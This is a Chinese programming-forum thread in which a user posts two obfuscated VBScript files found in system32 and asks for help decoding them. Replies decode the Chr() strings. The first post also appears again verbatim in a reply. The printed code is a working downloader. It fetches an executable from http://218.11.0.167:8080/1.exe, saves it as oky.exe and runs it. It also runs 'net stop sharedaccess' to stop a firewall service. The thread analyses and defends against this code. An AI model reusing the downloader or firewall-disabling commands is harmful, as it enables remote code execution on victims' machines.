电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看,该怎么解决
电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
在system32文件夹下:
文件1:run.vbs
内容:
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于不是直接含敏感代码,故而杀毒软件无视.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
------解决方案--------------------
。。。路过,节分
------解决方案--------------------
------解决方案--------------------
在system32文件夹下:
文件1:run.vbs
内容:
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于不是直接含敏感代码,故而杀毒软件无视.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
------解决方案--------------------
。。。路过,节分
------解决方案--------------------
------解决方案--------------------
- VB code
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108) Wscript.shell ?Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80) Microsoft.XMLHTTP ?Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48) GET http://218.11.0.167:8080/1.exe 0 ?Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109) ADODB.Stream ?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50) oky.exe 2 ?Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48) 10000 ?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101) oky.exe ?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108) Wscript.shell ?Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48) net stop sharedaccess 0 ?Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48) %windir%\run.vbs 0
------解决方案--------------------
run1.vbs
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)